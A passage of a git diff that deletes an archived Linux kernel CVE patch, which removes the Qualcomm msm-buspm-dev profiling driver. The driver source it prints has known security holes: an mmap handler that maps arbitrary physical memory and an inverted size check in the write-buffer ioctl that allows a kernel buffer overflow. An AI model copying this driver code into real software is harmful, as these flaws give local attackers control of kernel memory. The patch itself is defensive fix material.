-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-- * GNU General Public License for more details.
-- */
--
--/* #define DEBUG */
--
--#include <linux/module.h>
--#include <linux/fs.h>
--#include <linux/mm.h>
--#include <linux/err.h>
--#include <linux/slab.h>
--#include <linux/errno.h>
--#include <linux/device.h>
--#include <linux/uaccess.h>
--#include <linux/miscdevice.h>
--#include <linux/dma-mapping.h>
--#include <soc/qcom/rpm-smd.h>
--#include <uapi/linux/msm-buspm-dev.h>
--
--#define MSM_BUSPM_DRV_NAME "msm-buspm-dev"
--
--#ifdef CONFIG_COMPAT
--static long
--msm_buspm_dev_compat_ioctl(struct file *filp, unsigned int cmd,
--						unsigned long arg);
--#else
--#define msm_buspm_dev_compat_ioctl NULL
--#endif
--
--static long
--msm_buspm_dev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg);
--static int msm_buspm_dev_mmap(struct file *filp, struct vm_area_struct *vma);
--static int msm_buspm_dev_release(struct inode *inode, struct file *filp);
--static int msm_buspm_dev_open(struct inode *inode, struct file *filp);
--
--static const struct file_operations msm_buspm_dev_fops = {
--	.owner		= THIS_MODULE,
--	.mmap		= msm_buspm_dev_mmap,
--	.open		= msm_buspm_dev_open,
--	.unlocked_ioctl	= msm_buspm_dev_ioctl,
--	.compat_ioctl	= msm_buspm_dev_compat_ioctl,
--	.llseek		= noop_llseek,
--	.release	= msm_buspm_dev_release,
--};
--
--struct miscdevice msm_buspm_misc = {
--	.minor	= MISC_DYNAMIC_MINOR,
--	.name	= MSM_BUSPM_DRV_NAME,
--	.fops	= &msm_buspm_dev_fops,
--};
--
--
--enum msm_buspm_spdm_res {
--	SPDM_RES_ID = 0,
--	SPDM_RES_TYPE = 0x63707362,
--	SPDM_KEY = 0x00006e65,
--	SPDM_SIZE = 4,
--};
--/*
-- * Allocate kernel buffer.
-- * Currently limited to one buffer per file descriptor.  If alloc() is
-- * called twice for the same descriptor, the original buffer is freed.
-- * There is also no locking protection so the same descriptor can not be shared.
-- */
--
--static inline void *msm_buspm_dev_get_vaddr(struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	return (dev) ? dev->vaddr : NULL;
--}
--
--static inline unsigned int msm_buspm_dev_get_buflen(struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	return dev ? dev->buflen : 0;
--}
--
--static inline unsigned long msm_buspm_dev_get_paddr(struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	return (dev) ? dev->paddr : 0L;
--}
--
--static void msm_buspm_dev_free(struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	if (dev && dev->vaddr) {
--		pr_debug("freeing memory at 0x%p\n", dev->vaddr);
--		dma_free_coherent(msm_buspm_misc.this_device, dev->buflen,
--							dev->vaddr, dev->paddr);
--		dev->paddr = 0L;
--		dev->vaddr = NULL;
--	}
--}
--
--static int msm_buspm_dev_open(struct inode *inode, struct file *filp)
--{
--	struct msm_buspm_map_dev *dev;
--
--	if (capable(CAP_SYS_ADMIN)) {
--		dev = kzalloc(sizeof(*dev), GFP_KERNEL);
--		if (dev)
--			filp->private_data = dev;
--		else
--			return -ENOMEM;
--	} else {
--		return -EPERM;
--	}
--
--	return 0;
--}
--
--static int
--msm_buspm_dev_alloc(struct file *filp, struct buspm_alloc_params data)
--{
--	dma_addr_t paddr;
--	void *vaddr;
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	/* If buffer already allocated, then free it */
--	if (dev->vaddr)
--		msm_buspm_dev_free(filp);
--
--	/* Allocate uncached memory */
--	vaddr = dma_alloc_coherent(msm_buspm_misc.this_device, data.size,
--							&paddr, GFP_KERNEL);
--
--	if (vaddr == NULL) {
--		pr_err("allocation of 0x%zu bytes failed", data.size);
--		return -ENOMEM;
--	}
--
--	dev->vaddr = vaddr;
--	dev->paddr = paddr;
--	dev->buflen = data.size;
--	filp->f_pos = 0;
--	pr_debug("virt addr = 0x%p\n", dev->vaddr);
--	pr_debug("phys addr = 0x%lx\n", dev->paddr);
--
--	return 0;
--}
--
--static int msm_bus_rpm_req(u32 rsc_type, u32 key, u32 hwid,
--	int ctx, u32 val)
--{
--	struct msm_rpm_request *rpm_req;
--	int ret, msg_id;
--
--	rpm_req = msm_rpm_create_request(ctx, rsc_type, SPDM_RES_ID, 1);
--	if (rpm_req == NULL) {
--		pr_err("RPM: Couldn't create RPM Request\n");
--		return -ENXIO;
--	}
--
--	ret = msm_rpm_add_kvp_data(rpm_req, key, (const uint8_t *)&val,
--		(int)(sizeof(uint32_t)));
--	if (ret) {
--		pr_err("RPM: Add KVP failed for RPM Req:%u\n",
--			rsc_type);
--		goto err;
--	}
--
--	pr_debug("Added Key: %d, Val: %u, size: %zu\n", key,
--		(uint32_t)val, sizeof(uint32_t));
--	msg_id = msm_rpm_send_request(rpm_req);
--	if (!msg_id) {
--		pr_err("RPM: No message ID for req\n");
--		ret = -ENXIO;
--		goto err;
--	}
--
--	ret = msm_rpm_wait_for_ack(msg_id);
--	if (ret) {
--		pr_err("RPM: Ack failed\n");
--		goto err;
--	}
--
--err:
--	msm_rpm_free_request(rpm_req);
--	return ret;
--}
--
--static int msm_buspm_ioc_cmds(uint32_t arg)
--{
--	switch (arg) {
--	case MSM_BUSPM_SPDM_CLK_DIS:
--	case MSM_BUSPM_SPDM_CLK_EN:
--		return msm_bus_rpm_req(SPDM_RES_TYPE, SPDM_KEY, 0,
--				MSM_RPM_CTX_ACTIVE_SET, arg);
--	default:
--		pr_warn("Unsupported ioctl command: %d\n", arg);
--		return -EINVAL;
--	}
--}
--
--
--
--static long
--msm_buspm_dev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
--{
--	struct buspm_xfer_req xfer;
--	struct buspm_alloc_params alloc_data;
--	unsigned long paddr;
--	int retval = 0;
--	void *buf = msm_buspm_dev_get_vaddr(filp);
--	unsigned int buflen = msm_buspm_dev_get_buflen(filp);
--	unsigned char *dbgbuf = buf;
--
--	if (_IOC_TYPE(cmd) != MSM_BUSPM_IOC_MAGIC) {
--		pr_err("Wrong IOC_MAGIC.Exiting\n");
--		return -ENOTTY;
--	}
--
--	switch (cmd) {
--	case MSM_BUSPM_IOC_FREE:
--		pr_debug("cmd = 0x%x (FREE)\n", cmd);
--		msm_buspm_dev_free(filp);
--		break;
--
--	case MSM_BUSPM_IOC_ALLOC:
--		pr_debug("cmd = 0x%x (ALLOC)\n", cmd);
--		retval = __get_user(alloc_data.size, (uint32_t __user *)arg);
--
--		if (retval == 0)
--			retval = msm_buspm_dev_alloc(filp, alloc_data);
--		break;
--
--	case MSM_BUSPM_IOC_RD_PHYS_ADDR:
--		pr_debug("Read Physical Address\n");
--		paddr = msm_buspm_dev_get_paddr(filp);
--		if (paddr == 0L) {
--			retval = -EINVAL;
--		} else {
--			pr_debug("phys addr = 0x%lx\n", paddr);
--			retval = __put_user(paddr,
--				(unsigned long __user *)arg);
--		}
--		break;
--
--	case MSM_BUSPM_IOC_RDBUF:
--		if (!buf) {
--			retval = -EINVAL;
--			break;
--		}
--
--		pr_debug("Read Buffer: 0x%x%x%x%x\n",
--				dbgbuf[0], dbgbuf[1], dbgbuf[2], dbgbuf[3]);
--
--		if (copy_from_user(&xfer, (void __user *)arg, sizeof(xfer))) {
--			retval = -EFAULT;
--			break;
--		}
--
--		if ((xfer.size <= buflen) &&
--			(copy_to_user((void __user *)xfer.data, buf,
--					xfer.size))) {
--			retval = -EFAULT;
--			break;
--		}
--		break;
--
--	case MSM_BUSPM_IOC_WRBUF:
--		pr_debug("Write Buffer\n");
--
--		if (!buf) {
--			retval = -EINVAL;
--			break;
--		}
--
--		if (copy_from_user(&xfer, (void __user *)arg, sizeof(xfer))) {
--			retval = -EFAULT;
--			break;
--		}
--
--		if ((buflen <= xfer.size) &&
--			(copy_from_user(buf, (void __user *)xfer.data,
--			xfer.size))) {
--			retval = -EFAULT;
--			break;
--		}
--		break;
--
--	case MSM_BUSPM_IOC_CMD:
--		pr_debug("IOCTL command: cmd: %d arg: %lu\n", cmd, arg);
--		retval = msm_buspm_ioc_cmds(arg);
--		break;
--
--	default:
--		pr_debug("Unknown command 0x%x\n", cmd);
--		retval = -EINVAL;
--		break;
--	}
--
--	return retval;
--}
--
--static int msm_buspm_dev_release(struct inode *inode, struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	msm_buspm_dev_free(filp);
--	kfree(dev);
--	filp->private_data = NULL;
--
--	return 0;
--}
--
--static int msm_buspm_dev_mmap(struct file *filp, struct vm_area_struct *vma)
--{
--	pr_debug("vma = 0x%p\n", vma);
--
--	/* Mappings are uncached */
--	vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
--	if (remap_pfn_range(vma, vma->vm_start, vma->vm_pgoff,
--		vma->vm_end - vma->vm_start, vma->vm_page_prot))
--		return -EFAULT;
--
--	return 0;
--}
--
--#ifdef CONFIG_COMPAT
--static long
--msm_buspm_dev_compat_ioctl(struct file *filp, unsigned int cmd,
--						unsigned long arg)
--{
--	return msm_buspm_dev_ioctl(filp, cmd, (unsigned long)compat_ptr(arg));
--}
--#endif
--
--static int __init msm_buspm_dev_init(void)
--{
--	int ret = 0;
--
--	ret = misc_register(&msm_buspm_misc);
--	if (ret < 0) {
--		WARN_ON(1);
--		return ret;
--	}
--
--	if (msm_buspm_misc.this_device->coherent_dma_mask == 0)
--		msm_buspm_misc.this_device->coherent_dma_mask =
--							DMA_BIT_MASK(32);
--
--	return ret;
--}
--
--static void __exit msm_buspm_dev_exit(void)
--{
--	misc_deregister(&msm_buspm_misc);
--}
--module_init(msm_buspm_dev_init);
--module_exit(msm_buspm_dev_exit);
--
--MODULE_LICENSE("GPL v2");
--MODULE_VERSION("1.0");
--MODULE_ALIAS("platform:"MSM_BUSPM_DRV_NAME);
-diff --git a/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c b/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c
-index 9aec824..00b6e9a3 100644
---- a/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c
-+++ b/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c
-@@ -135,6 +135,7 @@ int msmbus_coresight_init_adhoc(struct platform_device *pdev,
- 		return PTR_ERR(pdata);
- 
- 	drvdata = platform_get_drvdata(pdev);
-+	dev_info(dev, "info: removed buspm module from kernel space\n");
- 	if (IS_ERR_OR_NULL(drvdata)) {
- 		drvdata = devm_kzalloc(dev, sizeof(*drvdata), GFP_KERNEL);
- 		if (!drvdata) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2442/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2442/ANY/0001.patch
deleted file mode 100644
index ababce7e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2442/ANY/0001.patch
+++ /dev/null
@@ -1,605 +0,0 @@
-From 6fb29c4773f632b7b6c31a8de56f55c32de3d350 Mon Sep 17 00:00:00 2001
-From: Kiran Gunda <kgunda@codeaurora.org>
-Date: Mon, 29 Feb 2016 13:27:50 +0530
-Subject: msm: msm_bus: remove the buspm module from kernel
-
-Remove the buspm module from msm_bus since it adds
-no functionality to the bus bandwidth aggregation
-driver. It is a loadable module used for profiling
-purposes.
-
-Change-Id: Ia0d21eb7e48d3cb2a74d4fae5ee4fb2fd449ea9f
-Signed-off-by: Kiran Gunda <kgunda@codeaurora.org>
----
- arch/arm/configs/msm8909_defconfig                 |   1 -
- arch/arm/configs/msm8909w-perf_defconfig           |   1 -
- arch/arm/configs/msm8909w_defconfig                |   1 -
- arch/arm/configs/msm8937-perf_defconfig            |   1 -
- arch/arm/configs/msm8937_defconfig                 |   1 -
- arch/arm/configs/msmcortex-perf_defconfig          |   1 -
- arch/arm/configs/msmcortex_defconfig               |   1 -
- arch/arm64/configs/msm-perf_defconfig              |   1 -
- arch/arm64/configs/msm8937-perf_defconfig          |   1 -
- arch/arm64/configs/msm8937_defconfig               |   1 -
- arch/arm64/configs/msm_defconfig                   |   1 -
- arch/arm64/configs/msmcortex-perf_defconfig        |   1 -
- arch/arm64/configs/msmcortex_defconfig             |   1 -
- drivers/platform/msm/Kconfig                       |   9 -
- drivers/platform/msm/msm_bus/Makefile              |   1 -
- drivers/platform/msm/msm_bus/msm-buspm-dev.c       | 368 ---------------------
- .../msm/msm_bus/msm_buspm_coresight_adhoc.c        |   1 +
- 17 files changed, 1 insertion(+), 391 deletions(-)
-
-diff --git a/arch/arm/configs/msm8909_defconfig b/arch/arm/configs/msm8909_defconfig
-index a8ab18c..e2621aa 100644
---- a/arch/arm/configs/msm8909_defconfig
-+++ b/arch/arm/configs/msm8909_defconfig
-@@ -383,7 +383,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y
- CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_REVID=y
- CONFIG_SPS=y
-diff --git a/arch/arm/configs/msm8909w-perf_defconfig b/arch/arm/configs/msm8909w-perf_defconfig
-index e6a2585..435f97e 100644
---- a/arch/arm/configs/msm8909w-perf_defconfig
-+++ b/arch/arm/configs/msm8909w-perf_defconfig
-@@ -407,7 +407,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y
- CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msm8909w_defconfig b/arch/arm/configs/msm8909w_defconfig
-index 7e4d0308d..2a8c354 100644
---- a/arch/arm/configs/msm8909w_defconfig
-+++ b/arch/arm/configs/msm8909w_defconfig
-@@ -409,7 +409,6 @@ CONFIG_ANDROID_LOW_MEMORY_KILLER=y
- CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msm8937-perf_defconfig b/arch/arm/configs/msm8937-perf_defconfig
-index fd0c4e9..48c10c8 100644
---- a/arch/arm/configs/msm8937-perf_defconfig
-+++ b/arch/arm/configs/msm8937-perf_defconfig
-@@ -471,7 +471,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msm8937_defconfig b/arch/arm/configs/msm8937_defconfig
-index 0c3e1d1..0d89f31 100644
---- a/arch/arm/configs/msm8937_defconfig
-+++ b/arch/arm/configs/msm8937_defconfig
-@@ -478,7 +478,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msmcortex-perf_defconfig b/arch/arm/configs/msmcortex-perf_defconfig
-index f41e11d..be65d54 100644
---- a/arch/arm/configs/msmcortex-perf_defconfig
-+++ b/arch/arm/configs/msmcortex-perf_defconfig
-@@ -474,7 +474,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm/configs/msmcortex_defconfig b/arch/arm/configs/msmcortex_defconfig
-index 3306d6c..c58a80a 100644
---- a/arch/arm/configs/msmcortex_defconfig
-+++ b/arch/arm/configs/msmcortex_defconfig
-@@ -475,7 +475,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm-perf_defconfig b/arch/arm64/configs/msm-perf_defconfig
-index c2c0232..05efc6f 100644
---- a/arch/arm64/configs/msm-perf_defconfig
-+++ b/arch/arm64/configs/msm-perf_defconfig
-@@ -479,7 +479,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm8937-perf_defconfig b/arch/arm64/configs/msm8937-perf_defconfig
-index c697e1f..e10acc8 100644
---- a/arch/arm64/configs/msm8937-perf_defconfig
-+++ b/arch/arm64/configs/msm8937-perf_defconfig
-@@ -484,7 +484,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm8937_defconfig b/arch/arm64/configs/msm8937_defconfig
-index b05e721c..3342d55 100644
---- a/arch/arm64/configs/msm8937_defconfig
-+++ b/arch/arm64/configs/msm8937_defconfig
-@@ -488,7 +488,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msm_defconfig b/arch/arm64/configs/msm_defconfig
-index 3d907ce..7054eb2 100644
---- a/arch/arm64/configs/msm_defconfig
-+++ b/arch/arm64/configs/msm_defconfig
-@@ -485,7 +485,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_DEBUG_BUS_VOTER=y
- CONFIG_QPNP_POWER_ON=y
-diff --git a/arch/arm64/configs/msmcortex-perf_defconfig b/arch/arm64/configs/msmcortex-perf_defconfig
-index b3292ed..d0b9681 100644
---- a/arch/arm64/configs/msmcortex-perf_defconfig
-+++ b/arch/arm64/configs/msmcortex-perf_defconfig
-@@ -487,7 +487,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/arch/arm64/configs/msmcortex_defconfig b/arch/arm64/configs/msmcortex_defconfig
-index a0176f1..8d449f9 100644
---- a/arch/arm64/configs/msmcortex_defconfig
-+++ b/arch/arm64/configs/msmcortex_defconfig
-@@ -491,7 +491,6 @@ CONFIG_ION=y
- CONFIG_ION_MSM=y
- CONFIG_MSM_AVTIMER=y
- CONFIG_MSM_BUS_SCALING=y
--CONFIG_MSM_BUSPM_DEV=m
- CONFIG_BUS_TOPOLOGY_ADHOC=y
- CONFIG_QPNP_POWER_ON=y
- CONFIG_QPNP_REVID=y
-diff --git a/drivers/platform/msm/Kconfig b/drivers/platform/msm/Kconfig
-index d1fabe1..b0a9a54 100644
---- a/drivers/platform/msm/Kconfig
-+++ b/drivers/platform/msm/Kconfig
-@@ -16,15 +16,6 @@ config MSM_BUS_SCALING
- 		for the active devices needs without keeping the clocks at max
- 		frequency when a slower speed is sufficient.
- 
--config MSM_BUSPM_DEV
--	tristate "MSM Bus Performance Monitor Kernel Module"
--	depends on MSM_BUS_SCALING
--	help
--	  This kernel module is used to mmap() hardware registers for the
--	  performance monitors, counters, etc. The module can also be used to
--	  allocate physical memory which is used by bus performance hardware to
--	  dump performance data
--
- config BUS_TOPOLOGY_ADHOC
- 	bool "ad-hoc bus scaling topology"
- 	help
-diff --git a/drivers/platform/msm/msm_bus/Makefile b/drivers/platform/msm/msm_bus/Makefile
-index fec4537..a58994d 100644
---- a/drivers/platform/msm/msm_bus/Makefile
-+++ b/drivers/platform/msm/msm_bus/Makefile
-@@ -24,4 +24,3 @@ endif
- 
- 
- obj-$(CONFIG_DEBUG_FS) += msm_bus_dbg.o
--obj-$(CONFIG_MSM_BUSPM_DEV) += msm-buspm-dev.o
-diff --git a/drivers/platform/msm/msm_bus/msm-buspm-dev.c b/drivers/platform/msm/msm_bus/msm-buspm-dev.c
-index 4d9262b..e69de29 100644
---- a/drivers/platform/msm/msm_bus/msm-buspm-dev.c
-+++ b/drivers/platform/msm/msm_bus/msm-buspm-dev.c
-@@ -1,368 +0,0 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-- * GNU General Public License for more details.
-- */
--
--/* #define DEBUG */
--
--#include <linux/module.h>
--#include <linux/fs.h>
--#include <linux/mm.h>
--#include <linux/err.h>
--#include <linux/slab.h>
--#include <linux/errno.h>
--#include <linux/device.h>
--#include <linux/uaccess.h>
--#include <linux/miscdevice.h>
--#include <linux/dma-mapping.h>
--#include <soc/qcom/rpm-smd.h>
--#include <uapi/linux/msm-buspm-dev.h>
--
--#define MSM_BUSPM_DRV_NAME "msm-buspm-dev"
--
--#ifdef CONFIG_COMPAT
--static long
--msm_buspm_dev_compat_ioctl(struct file *filp, unsigned int cmd,
--						unsigned long arg);
--#else
--#define msm_buspm_dev_compat_ioctl NULL
--#endif
--
--static long
--msm_buspm_dev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg);
--static int msm_buspm_dev_mmap(struct file *filp, struct vm_area_struct *vma);
--static int msm_buspm_dev_release(struct inode *inode, struct file *filp);
--static int msm_buspm_dev_open(struct inode *inode, struct file *filp);
--
--static const struct file_operations msm_buspm_dev_fops = {
--	.owner		= THIS_MODULE,
--	.mmap		= msm_buspm_dev_mmap,
--	.open		= msm_buspm_dev_open,
--	.unlocked_ioctl	= msm_buspm_dev_ioctl,
--	.compat_ioctl	= msm_buspm_dev_compat_ioctl,
--	.llseek		= noop_llseek,
--	.release	= msm_buspm_dev_release,
--};
--
--struct miscdevice msm_buspm_misc = {
--	.minor	= MISC_DYNAMIC_MINOR,
--	.name	= MSM_BUSPM_DRV_NAME,
--	.fops	= &msm_buspm_dev_fops,
--};
--
--
--enum msm_buspm_spdm_res {
--	SPDM_RES_ID = 0,
--	SPDM_RES_TYPE = 0x63707362,
--	SPDM_KEY = 0x00006e65,
--	SPDM_SIZE = 4,
--};
--/*
-- * Allocate kernel buffer.
-- * Currently limited to one buffer per file descriptor.  If alloc() is
-- * called twice for the same descriptor, the original buffer is freed.
-- * There is also no locking protection so the same descriptor can not be shared.
-- */
--
--static inline void *msm_buspm_dev_get_vaddr(struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	return (dev) ? dev->vaddr : NULL;
--}
--
--static inline unsigned int msm_buspm_dev_get_buflen(struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	return dev ? dev->buflen : 0;
--}
--
--static inline unsigned long msm_buspm_dev_get_paddr(struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	return (dev) ? dev->paddr : 0L;
--}
--
--static void msm_buspm_dev_free(struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	if (dev && dev->vaddr) {
--		pr_debug("freeing memory at 0x%p\n", dev->vaddr);
--		dma_free_coherent(msm_buspm_misc.this_device, dev->buflen,
--							dev->vaddr, dev->paddr);
--		dev->paddr = 0L;
--		dev->vaddr = NULL;
--	}
--}
--
--static int msm_buspm_dev_open(struct inode *inode, struct file *filp)
--{
--	struct msm_buspm_map_dev *dev;
--
--	if (capable(CAP_SYS_ADMIN)) {
--		dev = kzalloc(sizeof(*dev), GFP_KERNEL);
--		if (dev)
--			filp->private_data = dev;
--		else
--			return -ENOMEM;
--	} else {
--		return -EPERM;
--	}
--
--	return 0;
--}
--
--static int
--msm_buspm_dev_alloc(struct file *filp, struct buspm_alloc_params data)
--{
--	dma_addr_t paddr;
--	void *vaddr;
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	/* If buffer already allocated, then free it */
--	if (dev->vaddr)
--		msm_buspm_dev_free(filp);
--
--	/* Allocate uncached memory */
--	vaddr = dma_alloc_coherent(msm_buspm_misc.this_device, data.size,
--							&paddr, GFP_KERNEL);
--
--	if (vaddr == NULL) {
--		pr_err("allocation of 0x%zu bytes failed", data.size);
--		return -ENOMEM;
--	}
--
--	dev->vaddr = vaddr;
--	dev->paddr = paddr;
--	dev->buflen = data.size;
--	filp->f_pos = 0;
--	pr_debug("virt addr = 0x%p\n", dev->vaddr);
--	pr_debug("phys addr = 0x%lx\n", dev->paddr);
--
--	return 0;
--}
--
--static int msm_bus_rpm_req(u32 rsc_type, u32 key, u32 hwid,
--	int ctx, u32 val)
--{
--	struct msm_rpm_request *rpm_req;
--	int ret, msg_id;
--
--	rpm_req = msm_rpm_create_request(ctx, rsc_type, SPDM_RES_ID, 1);
--	if (rpm_req == NULL) {
--		pr_err("RPM: Couldn't create RPM Request\n");
--		return -ENXIO;
--	}
--
--	ret = msm_rpm_add_kvp_data(rpm_req, key, (const uint8_t *)&val,
--		(int)(sizeof(uint32_t)));
--	if (ret) {
--		pr_err("RPM: Add KVP failed for RPM Req:%u\n",
--			rsc_type);
--		goto err;
--	}
--
--	pr_debug("Added Key: %d, Val: %u, size: %zu\n", key,
--		(uint32_t)val, sizeof(uint32_t));
--	msg_id = msm_rpm_send_request(rpm_req);
--	if (!msg_id) {
--		pr_err("RPM: No message ID for req\n");
--		ret = -ENXIO;
--		goto err;
--	}
--
--	ret = msm_rpm_wait_for_ack(msg_id);
--	if (ret) {
--		pr_err("RPM: Ack failed\n");
--		goto err;
--	}
--
--err:
--	msm_rpm_free_request(rpm_req);
--	return ret;
--}
--
--static int msm_buspm_ioc_cmds(uint32_t arg)
--{
--	switch (arg) {
--	case MSM_BUSPM_SPDM_CLK_DIS:
--	case MSM_BUSPM_SPDM_CLK_EN:
--		return msm_bus_rpm_req(SPDM_RES_TYPE, SPDM_KEY, 0,
--				MSM_RPM_CTX_ACTIVE_SET, arg);
--	default:
--		pr_warn("Unsupported ioctl command: %d\n", arg);
--		return -EINVAL;
--	}
--}
--
--
--
--static long
--msm_buspm_dev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
--{
--	struct buspm_xfer_req xfer;
--	struct buspm_alloc_params alloc_data;
--	unsigned long paddr;
--	int retval = 0;
--	void *buf = msm_buspm_dev_get_vaddr(filp);
--	unsigned int buflen = msm_buspm_dev_get_buflen(filp);
--	unsigned char *dbgbuf = buf;
--
--	if (_IOC_TYPE(cmd) != MSM_BUSPM_IOC_MAGIC) {
--		pr_err("Wrong IOC_MAGIC.Exiting\n");
--		return -ENOTTY;
--	}
--
--	switch (cmd) {
--	case MSM_BUSPM_IOC_FREE:
--		pr_debug("cmd = 0x%x (FREE)\n", cmd);
--		msm_buspm_dev_free(filp);
--		break;
--
--	case MSM_BUSPM_IOC_ALLOC:
--		pr_debug("cmd = 0x%x (ALLOC)\n", cmd);
--		retval = __get_user(alloc_data.size, (uint32_t __user *)arg);
--
--		if (retval == 0)
--			retval = msm_buspm_dev_alloc(filp, alloc_data);
--		break;
--
--	case MSM_BUSPM_IOC_RD_PHYS_ADDR:
--		pr_debug("Read Physical Address\n");
--		paddr = msm_buspm_dev_get_paddr(filp);
--		if (paddr == 0L) {
--			retval = -EINVAL;
--		} else {
--			pr_debug("phys addr = 0x%lx\n", paddr);
--			retval = __put_user(paddr,
--				(unsigned long __user *)arg);
--		}
--		break;
--
--	case MSM_BUSPM_IOC_RDBUF:
--		if (!buf) {
--			retval = -EINVAL;
--			break;
--		}
--
--		pr_debug("Read Buffer: 0x%x%x%x%x\n",
--				dbgbuf[0], dbgbuf[1], dbgbuf[2], dbgbuf[3]);
--
--		if (copy_from_user(&xfer, (void __user *)arg, sizeof(xfer))) {
--			retval = -EFAULT;
--			break;
--		}
--
--		if ((xfer.size <= buflen) &&
--			(copy_to_user((void __user *)xfer.data, buf,
--					xfer.size))) {
--			retval = -EFAULT;
--			break;
